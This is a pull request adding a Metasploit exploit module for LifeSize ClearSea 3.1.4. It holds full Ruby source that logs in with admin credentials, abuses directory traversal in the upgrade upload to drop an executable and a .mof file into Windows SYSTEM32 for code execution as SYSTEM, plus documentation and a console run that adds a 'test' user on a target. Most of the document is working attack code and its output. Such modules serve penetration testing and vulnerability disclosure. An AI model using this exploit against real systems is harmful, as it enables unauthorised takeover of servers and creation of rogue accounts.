### PR TITLE
Add lifesize_clearsea_file_upload_rce exploit module

### DIFF
--- a/documentation/modules/exploit/windows/http/lifesize_clearsea_file_upload_rce.md
+++ b/documentation/modules/exploit/windows/http/lifesize_clearsea_file_upload_rce.md
@@ -1,0 +1,131 @@
+This module exploits a post-authentication directory traversal vulnerability on LifeSize ClearSea 3.1.4 server to gain remote code execution as SYSTEM user.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/windows/http/lifesize_clearsea_file_upload_rce`
+  3. Set `RHOST`
+  4. Set `ADMIN_USER` and `ADMIN_PASS` for valid admin credential to login
+  5. Run `check` to check if remote host is vulnerable
+  6. Set `payload` and required options
+  7. Run `run` to execute the exploit
+  8. The specified payload should be executed on target
+
+## Options
+
+  **ADMIN_USER**
+  Admin user name. Default is admin.
+  **ADMIN_PASS**
+  Admin password. Default is admin.
+
+## Scenarios
+
+To execute specified payload:
+```
+msf > use exploit/windows/http/lifesize_clearsea_file_upload_rce
+msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set ADMIN_USER admin
+ADMIN_USER => admin
+msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set ADMIN_PASS admin
+ADMIN_PASS => admin
+msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > check 
+
+[*] Authenticating as user 'admin'...
+[*] Successfully authenticated as user 'admin'
+[+] 127.0.0.1:8800 The target is vulnerable.
+msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set payload windows/exec 
+payload => windows/exec
+msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set CMD net user test password /add
+CMD => net user test password /add
+msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > run 
+
+[*] Authenticating as user 'admin'...
+[*] Successfully authenticated as user 'admin'
+[*] Generating .exe payload...
+[*] Uploading .exe payload NkNlLuOTF.exe...
+[*] Generating .mof file...
+[*] Uploading .mof file OyMXijFO.mof...
+[!] This exploit may require manual cleanup of 'NkNlLuOTF.exe' on the target
+[!] This exploit may require manual cleanup of 'WBEM\MOF\GOOD\OyMXijFO.mof' on the target
+[*] Exploit completed, but no session was created.
+```
+
+Target (before exploit ran):
+```
+C:\>type C:\ClearSea\etc\product.ini
+type C:\ClearSea\etc\product.ini
+[PRODUCT]
+code=ClearSea
+version=3.1.4
+build=59125
+port=8800
+
+[MANAGEMENT]
+servicesStartOrder=ClearSea-HttpAS
+servicesStopOrder=ClearSea;ClearSea-HttpAS;ClearSea-PgSQL
+controlPanelUrl=http://{host}:8800
+sharedFolders.0.path=log
+sharedFolders.0.fullAccess=false
+rescueServerResourcesPath=webapps/rescueserver
+
+[SECURITY]
+restrictedTcpPorts=8800;3388;3389;139;445;8801;
+restrictedUdpPorts=137;138;161;162;
+
+[SNMP]
+apiUrl=http://localhost:65356/processor
+
+[HOUSEKEEPING]
+cleanPattern.0.path=log/*
+cleanPattern.0.maxAgeDays=32
+cleanPattern.0.rmEmptySubdirs=false
+cleanPattern.1.path=data/temp/*
+cleanPattern.1.maxAgeDays=2
+cleanPattern.1.rmEmptySubdirs=true
+cleanPattern.2.path=data/record/*
+cleanPattern.2.maxAgeDays=2
+cleanPattern.2.rmEmptySubdirs=true
+cleanPattern.3.path=log/heapDumps/*
+cleanPattern.3.maxAgeDays=2
+cleanPattern.3.rmEmptySubdirs=false
+
+[TROUBLESHOOTING]
+collectPattern.0.path=log/*{date}*
+collectPattern.1.path=cfg/*
+collectPattern.2.path=bin/ClearSea.lic
+collectPattern.3.path=etc/product.ini
+collectPattern.4.path=log/out.log
+collectPattern.5.path=log/err.log
+collectPattern.6.path=log/cdr/*{date}*
+collectPattern.7.path=data/database/data/*.err
+collectPattern.8.path=log/dmp/*{date}*
+collectPattern.9.path=data/backup/*.sql
+collectPattern.10.path=log/internal/*{date}*
+collectPattern.11.path=log/heapDumps/*
+
+C:\>net user
+net user
+
+User accounts for \\
+
+-------------------------------------------------------------------------------
+Administrator            ClearSea                 console                  
+Guest                    restore                  
+The command completed with one or more errors.
+
+```
+
+Target (after exploit ran)
+```
+C:\>net user
+net user
+
+User accounts for \\
+
+-------------------------------------------------------------------------------
+Administrator            ClearSea                 console                  
+Guest                    restore                  test                     
+The command completed with one or more errors.
+
+```

--- a/modules/exploits/windows/http/lifesize_clearsea_file_upload_rce.rb
+++ b/modules/exploits/windows/http/lifesize_clearsea_file_upload_rce.rb
@@ -1,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::WbemExec
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LifeSize ClearSea Control Panel Authenticated RCE via File Upload',
+      'Description'    => %q{
+        This module exploits an arbitrary file upload vulnerability in LifeSize
+        ClearSea Control Panel 3.1.4. When authenticated as admin, the Software
+        Upgrade component allows attacker to upload malicious file onto arbitrary
+        location due to a directory traversal vulnerability, which leads to remote
+        code execution as SYSTEM user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rsp3ar <lukunming[at]gmail.com>' # Discovery/Metasploit Module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.exploit-db.com/exploits/44390/']
+        ],
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          ['LifeSize ClearSea Control Panel 3.1.4 / Windows XP Embedded', {}]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 31 2018'))
+
+    register_options(
+      [
+        Opt::RPORT(8800),
+        OptString.new('ADMIN_USER', [true, 'Admin Username', 'admin']),
+        OptString.new('ADMIN_PASS', [true, 'Admin Password', 'admin'])
+      ])
+  end
+
+  def traversal
+    "..\\" * 8
+  end
+
+  def login(user, pass)
+    print_status("Authenticating as user '#{user}'...")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri('/')
+    })
+
+    fail_with(Failure::Unreachable, 'No response received from the target.') unless res
+
+    @cookie = res.get_cookies
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri('smartgui', '/'),
+      'vars_post' => {
+        'smartGuiAuthenticate' => 't',
+        'email'                => user,
+        'password'             => pass
+      },
+      'cookie'    => @cookie
+    })
+    @cookie << res.get_cookies
+    vprint_status("Cookie: #{@cookie}")
+
+    unless @cookie.include? "smartguiSessionID"
+      fail_with(Failure::NoAccess, "Authentication failed.")
+      return false
+    end
+
+    print_status("Successfully authenticated as user '#{user}'")
+    return true
+  end
+
+  def upload(file_path, contents)
+    boundary = rand_text_alpha(30)
+    body = []
+    body << "\r\n--#{boundary}\r\n"
+    body << "Content-Disposition: form-data; name=\"SmartGuiUploadField\"; filename=\"#{rand_text_alpha(5)}.txt\"\r\n"
+    body << "Content-Type: text/plain\r\n\r\n"
+    body << contents
+    body << "\r\n\r\n--#{boundary}--\r\n"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('smartgui', 'upload', '-m-ClearSea-c-DHP_PKG_UPLOAD_FORM-w-filename', rand_text_alpha(10), file_path),
+      'ctype' => "multipart/form-data, boundary=#{boundary}",
+      'cookie' => @cookie,
+      'data' => body.join
+    })
+  end
+
+  def exploit
+    login(datastore['ADMIN_USER'], datastore['ADMIN_PASS'])
+
+    print_status("Generating .exe payload...")
+    exe_name = "#{rand_text_alpha(rand(5)+5)}.exe"
+    exe_content = generate_payload_exe
+    exe_file_path = "#{traversal}WINDOWS\\SYSTEM32\\#{exe_name}"
+    print_status("Uploading .exe payload #{exe_name}...")
+    upload(exe_file_path, exe_content)
+    register_file_for_cleanup(exe_name)
+
+    print_status("Generating .mof file...")
+    mof_name = "#{rand_text_alpha(rand(5)+5)}.mof"
+    mof_content = generate_mof(mof_name, exe_name)
+    mof_file_path = "#{traversal}WINDOWS\\SYSTEM32\\WBEM\\MOF\\#{mof_name}"
+    print_status("Uploading .mof file #{mof_name}...")
+    upload(mof_file_path, mof_content)
+    register_file_for_cleanup("WBEM\\MOF\\GOOD\\#{mof_name}")
+  end
+
+  def check
+    unless login(datastore['ADMIN_USER'], datastore['ADMIN_PASS'])
+      return Exploit::CheckCode::Unknown
+    end
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('smartgui', 'sessionService'),
+      'ctype' => 'text/x-gwt-rpc; charset=utf-8',
+      'cookie' => @cookie,
+      'data' => '5|0|4|||com.manthia.gui.metadata.client.SessionService|beginSession|1|2|3|4|0|'
+    })
+    session_token = res.body.scan(/"([^"]*)"/)[8].first
+    vprint_status("Obtained smartgui session token #{session_token}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('smartgui', 'formService'),
+      'ctype' => 'text/x-gwt-rpc; charset=utf-8',
+      'cookie' => @cookie,
+      'data' => "5|0|7|||com.manthia.gui.metadata.client.FormService|load|java.lang.String|#{session_token}|-m-ClearSea-c-SYSTEM_STATUS_FORM|1|2|3|4|2|5|5|6|7|"
+    })
+    if res && res.body =~ /3\.1\.4/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+end

--- a/modules/exploits/windows/http/lifesize_clearsea_file_upload_rce.rb
+++ b/modules/exploits/windows/http/lifesize_clearsea_file_upload_rce.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          ['URL', 'https://www.exploit-db.com/exploits/44390/']
+          ['EDB', '44390']
         ],
       'Payload'        =>
         {
@@ -46,45 +46,59 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8800),
-        OptString.new('ADMIN_USER', [true, 'Admin Username', 'admin']),
-        OptString.new('ADMIN_PASS', [true, 'Admin Password', 'admin'])
+        OptInt.new('DEPTH', [true, 'Traversal depth', 8]),
+        OptString.new('USER', [true, 'Admin Username', 'admin']),
+        OptString.new('PASS', [true, 'Admin Password', 'admin'])
       ])
+    register_advanced_options [
+      OptBool.new('ForceExploit', [true, 'Override check result', false])
+    ]
   end
 
   def traversal
-    "..\\" * 8
+    "..\\" * datastore['DEPTH']
   end
 
   def login(user, pass)
     print_status("Authenticating as user '#{user}'...")
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri'    => normalize_uri('/')
-    })
-
-    fail_with(Failure::Unreachable, 'No response received from the target.') unless res
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri('/')
+      })
+    rescue Rex::ConnectionError, Errno::ENOTCONN => e
+      vprint_error(e.message)
+      return false
+    end
 
     @cookie = res.get_cookies
-    res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => normalize_uri('smartgui', '/'),
-      'vars_post' => {
-        'smartGuiAuthenticate' => 't',
-        'email'                => user,
-        'password'             => pass
-      },
-      'cookie'    => @cookie
-    })
+
+    begin
+      res = send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => normalize_uri('smartgui', '/'),
+        'vars_post' => {
+          'smartGuiAuthenticate' => 't',
+          'email'                => user,
+          'password'             => pass
+        },
+        'cookie'    => @cookie
+      })
+    rescue Rex::ConnectionError, Errno::ENOTCONN => e
+      vprint_error(e.message)
+      return false
+    end
+
     @cookie << res.get_cookies
     vprint_status("Cookie: #{@cookie}")
 
-    unless @cookie.include? "smartguiSessionID"
-      fail_with(Failure::NoAccess, "Authentication failed.")
+    unless @cookie.include? 'smartguiSessionID'
+      vprint_error('Authentication failed.')
       return false
     end
 
     print_status("Successfully authenticated as user '#{user}'")
-    return true
+    true
   end
 
   def upload(file_path, contents)
@@ -106,10 +120,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    login(datastore['ADMIN_USER'], datastore['ADMIN_PASS'])
+    unless CheckCode::Vulnerable == check
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
 
     print_status("Generating .exe payload...")
-    exe_name = "#{rand_text_alpha(rand(5)+5)}.exe"
+    exe_name = "#{rand_text_alpha(5..10)}.exe"
     exe_content = generate_payload_exe
     exe_file_path = "#{traversal}WINDOWS\\SYSTEM32\\#{exe_name}"
     print_status("Uploading .exe payload #{exe_name}...")
@@ -117,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_file_for_cleanup(exe_name)
 
     print_status("Generating .mof file...")
-    mof_name = "#{rand_text_alpha(rand(5)+5)}.mof"
+    mof_name = "#{rand_text_alpha(5..10)}.mof"
     mof_content = generate_mof(mof_name, exe_name)
     mof_file_path = "#{traversal}WINDOWS\\SYSTEM32\\WBEM\\MOF\\#{mof_name}"
     print_status("Uploading .mof file #{mof_name}...")
@@ -126,31 +145,41 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    unless login(datastore['ADMIN_USER'], datastore['ADMIN_PASS'])
-      return Exploit::CheckCode::Unknown
+    unless login(datastore['USER'], datastore['PASS'])
+      return CheckCode::Unknown
     end
 
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri('smartgui', 'sessionService'),
-      'ctype' => 'text/x-gwt-rpc; charset=utf-8',
-      'cookie' => @cookie,
-      'data' => '5|0|4|||com.manthia.gui.metadata.client.SessionService|beginSession|1|2|3|4|0|'
-    })
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri('smartgui', 'sessionService'),
+        'ctype' => 'text/x-gwt-rpc; charset=utf-8',
+        'cookie' => @cookie,
+        'data' => '5|0|4|||com.manthia.gui.metadata.client.SessionService|beginSession|1|2|3|4|0|'
+      })
+    rescue Rex::ConnectionError, Errno::ENOTCONN => e
+      return CheckCode::Unknown
+    end
+
     session_token = res.body.scan(/"([^"]*)"/)[8].first
     vprint_status("Obtained smartgui session token #{session_token}")
 
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri('smartgui', 'formService'),
-      'ctype' => 'text/x-gwt-rpc; charset=utf-8',
-      'cookie' => @cookie,
-      'data' => "5|0|7|||com.manthia.gui.metadata.client.FormService|load|java.lang.String|#{session_token}|-m-ClearSea-c-SYSTEM_STATUS_FORM|1|2|3|4|2|5|5|6|7|"
-    })
-    if res && res.body =~ /3\.1\.4/
-      return Exploit::CheckCode::Vulnerable
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri('smartgui', 'formService'),
+        'ctype' => 'text/x-gwt-rpc; charset=utf-8',
+        'cookie' => @cookie,
+        'data' => "5|0|7|||com.manthia.gui.metadata.client.FormService|load|java.lang.String|#{session_token}|-m-ClearSea-c-SYSTEM_STATUS_FORM|1|2|3|4|2|5|5|6|7|"
+      })
+    rescue Rex::ConnectionError, Errno::ENOTCONN => e
+      return CheckCode::Unknown
     end
 
-    Exploit::CheckCode::Safe
+    if res && res.body.include?('3.1.4')
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
   end
 end


### PR DESCRIPTION
This module exploits a post-authentication directory traversal vulnerability on LifeSize ClearSea 3.1.4 server to gain remote code execution as SYSTEM user.

## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/windows/http/lifesize_clearsea_file_upload_rce`
  3. Set `RHOST`
  4. Set `ADMIN_USER` and `ADMIN_PASS` for valid admin credential to login
  5. Run `check` to check if remote host is vulnerable
  6. Set `payload` and required options
  7. Run `run` to execute the exploit
  8. The specified payload should be executed on target

## Options

  **ADMIN_USER**
  Admin user name. Default is admin.
  **ADMIN_PASS**
  Admin password. Default is admin.

## Scenarios

To execute specified payload:
```
msf > use exploit/windows/http/lifesize_clearsea_file_upload_rce
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set ADMIN_USER admin
ADMIN_USER => admin
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set ADMIN_PASS admin
ADMIN_PASS => admin
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > check 

[*] Authenticating as user 'admin'...
[*] Successfully authenticated as user 'admin'
[+] 127.0.0.1:8800 The target is vulnerable.
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set payload windows/exec 
payload => windows/exec
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set CMD net user test password /add
CMD => net user test password /add
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > run 

[*] Authenticating as user 'admin'...
[*] Successfully authenticated as user 'admin'
[*] Generating .exe payload...
[*] Uploading .exe payload NkNlLuOTF.exe...
[*] Generating .mof file...
[*] Uploading .mof file OyMXijFO.mof...
[!] This exploit may require manual cleanup of 'NkNlLuOTF.exe' on the target
[!] This exploit may require manual cleanup of 'WBEM\MOF\GOOD\OyMXijFO.mof' on the target
[*] Exploit completed, but no session was created.
```

Target (before exploit ran):
```
C:\>type C:\ClearSea\etc\product.ini
type C:\ClearSea\etc\product.ini
[PRODUCT]
code=ClearSea
version=3.1.4
build=59125
port=8800

[MANAGEMENT]
servicesStartOrder=ClearSea-HttpAS
servicesStopOrder=ClearSea;ClearSea-HttpAS;ClearSea-PgSQL
controlPanelUrl=http://{host}:8800
sharedFolders.0.path=log
sharedFolders.0.fullAccess=false
rescueServerResourcesPath=webapps/rescueserver

[SECURITY]
restrictedTcpPorts=8800;3388;3389;139;445;8801;
restrictedUdpPorts=137;138;161;162;

[SNMP]
apiUrl=http://localhost:65356/processor

[HOUSEKEEPING]
cleanPattern.0.path=log/*
cleanPattern.0.maxAgeDays=32
cleanPattern.0.rmEmptySubdirs=false
cleanPattern.1.path=data/temp/*
cleanPattern.1.maxAgeDays=2
cleanPattern.1.rmEmptySubdirs=true
cleanPattern.2.path=data/record/*
cleanPattern.2.maxAgeDays=2
cleanPattern.2.rmEmptySubdirs=true
cleanPattern.3.path=log/heapDumps/*
cleanPattern.3.maxAgeDays=2
cleanPattern.3.rmEmptySubdirs=false

[TROUBLESHOOTING]
collectPattern.0.path=log/*{date}*
collectPattern.1.path=cfg/*
collectPattern.2.path=bin/ClearSea.lic
collectPattern.3.path=etc/product.ini
collectPattern.4.path=log/out.log
collectPattern.5.path=log/err.log
collectPattern.6.path=log/cdr/*{date}*
collectPattern.7.path=data/database/data/*.err
collectPattern.8.path=log/dmp/*{date}*
collectPattern.9.path=data/backup/*.sql
collectPattern.10.path=log/internal/*{date}*
collectPattern.11.path=log/heapDumps/*

C:\>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            ClearSea                 console                  
Guest                    restore                  
The command completed with one or more errors.

```

Target (after exploit ran)
```
C:\>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            ClearSea                 console                  
Guest                    restore                  test                     
The command completed with one or more errors.

```